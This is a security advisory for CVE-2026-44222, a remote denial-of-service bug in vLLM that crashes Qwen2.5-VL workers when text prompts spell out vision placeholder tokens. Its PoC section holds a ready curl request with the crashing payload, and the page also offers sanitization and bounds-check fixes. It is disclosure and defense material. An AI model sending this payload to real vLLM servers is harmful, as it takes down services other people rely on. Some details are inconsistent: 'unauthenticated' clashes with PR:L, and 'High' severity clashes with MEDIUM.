CVE-2026-44222

GHSA-hpv8-x276-m59f MEDIUM
Published May 5, 2026

## Summary

This report describes a token-injection vulnerability in vLLM's multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. Image and video placeholder sequences supplied without matching multimodal data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability.
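One interim defense (a sketch of an input-sanitization idea, not vLLM's official fix) is to reject model-specific special-token placeholders in untrusted plain text before it reaches the server. The token names below are the Qwen2.5-VL markers used in the PoC; other models use different marker strings, so the list is an assumption and not exhaustive.

```python
import re

# Qwen2.5-VL vision placeholder tokens from the PoC request (assumed list).
SPECIAL_TOKEN_PATTERN = re.compile(
    r"<\|(?:vision_start|vision_end|image_pad|video_pad)\|>"
)

def reject_special_tokens(user_text: str) -> str:
    """Raise ValueError if untrusted text spells out vision control tokens."""
    if SPECIAL_TOKEN_PATTERN.search(user_text):
        raise ValueError("special-token placeholder found in plain text input")
    return user_text
```

A gateway or proxy in front of the OpenAI-compatible endpoint could apply this check to every text content part and return a 400 instead of forwarding the request.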


Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| vllm | pip | >= 0.6.1, < 0.20.0 | 0.20.0 |


Severity & Risk

- CVSS 3.1: 6.5 / 10
- EPSS: N/A
- Exploitation Status: No known exploitation
- Sophistication: N/A

Attack Surface

- Attack Vector (AV): Network
- Attack Complexity (AC): Low
- Privileges Required (PR): Low
- User Interaction (UI): None
- Scope (S): Unchanged
- Confidentiality (C): None
- Integrity (I): None
- Availability (A): High

Recommended Action

Patch available

Update vllm to version 0.20.0
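The upgrade itself is a one-line pip command (`pip install --upgrade "vllm>=0.20.0"`). A deployment script might also verify the installed version before serving traffic; a minimal sketch, where the version-comparison helper is illustrative and not part of vLLM:

```python
def is_patched(installed: str, patched: str = "0.20.0") -> bool:
    """Compare dotted version strings numerically.

    Pre-release/local-version suffixes are ignored; use packaging.version
    for full PEP 440 semantics in production.
    """
    def parts(v: str) -> tuple:
        return tuple(int(p) for p in v.split("+")[0].split(".") if p.isdigit())
    return parts(installed) >= parts(patched)
```

In practice you would feed this `importlib.metadata.version("vllm")` and refuse to start the service when it returns False.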


Frequently Asked Questions

What is CVE-2026-44222?

CVE-2026-44222 is a vulnerability in vLLM's multimodal processing that allows a remote denial of service via special-token placeholders in text-only prompts.

Is CVE-2026-44222 actively exploited?

No confirmed active exploitation of CVE-2026-44222 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44222?

Update to the patched version: vllm 0.20.0.

What is the CVSS score for CVE-2026-44222?

CVE-2026-44222 has a CVSS v3.1 base score of 6.5 (MEDIUM).

Technical Details

NVD Description

## Summary

This report describes a token-injection vulnerability in vLLM's multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

## Details

- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
  - vllm/model_executor/layers/rotary_embedding.py
    - get_input_positions_tensor(...)
    - _vl_get_input_positions_tensor(...)
- Failure mechanism:
  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

```python
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
```

Abbreviated call path:

```
OpenAI API request
→ vllm.v1.engine.core: step/execute_model
→ vllm.v1.worker.gpu_model_runner: _update_states/execute_model
→ vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
→ _vl_get_input_positions_tensor
→ IndexError: list index out of range
```

## PoC

### Environment

- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:

```bash
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000
```

### Request (text-only, no image/video data)

```bash
cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>"
        }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json
```

### Observed result

- HTTP 500; logs show `IndexError: list index out of range` from `_vl_get_input_positions_tensor(...)`.
- In some deployments, the worker exits and capacity remains reduced until manual restart.

## Impact

- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.

## Fixes

- Changes associated with https://github.com/vllm-project/vllm/issues/32656

## Credits

- Pengyu Ding (Infra Security, Ant Group)
- Ziteng Xu (Infra Security, Ant Group)
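The underlying fix pattern is a bounds check before indexing the grid data, turning the crash into a recoverable per-request error. A simplified, self-contained sketch (not the actual vLLM patch; names mirror the snippet above):

```python
def get_grid_dims(video_grid_thw: list, video_index: int) -> tuple:
    """Return (t, h, w) for a video grid entry.

    Rejects placeholder-only requests with a recoverable error instead of
    letting an IndexError propagate and kill the worker.
    """
    if video_index >= len(video_grid_thw):
        # Placeholder tokens present, but no matching video payload was
        # supplied: fail this request rather than the whole engine.
        raise ValueError(
            "video placeholder token present but no video grid data supplied"
        )
    t, h, w = video_grid_thw[video_index]
    return t, h, w
```

A server layer that catches ValueError here can map it to an HTTP 400 for the offending request while the worker keeps serving others.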

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
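The vector string decomposes mechanically into metric/value pairs, which is how the Attack Surface list above is derived. A small illustrative parser (a sketch, not a full CVSS implementation):

```python
def parse_cvss_vector(vector: str) -> dict:
    """Split a CVSS v3.1 vector string into a metric -> value mapping."""
    prefix, _, metrics = vector.partition("/")
    if not prefix.startswith("CVSS:"):
        raise ValueError("not a CVSS vector string")
    return dict(m.split(":") for m in metrics.split("/"))
```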

Timeline

Published
May 5, 2026
Last Modified
May 5, 2026
First Seen
May 6, 2026
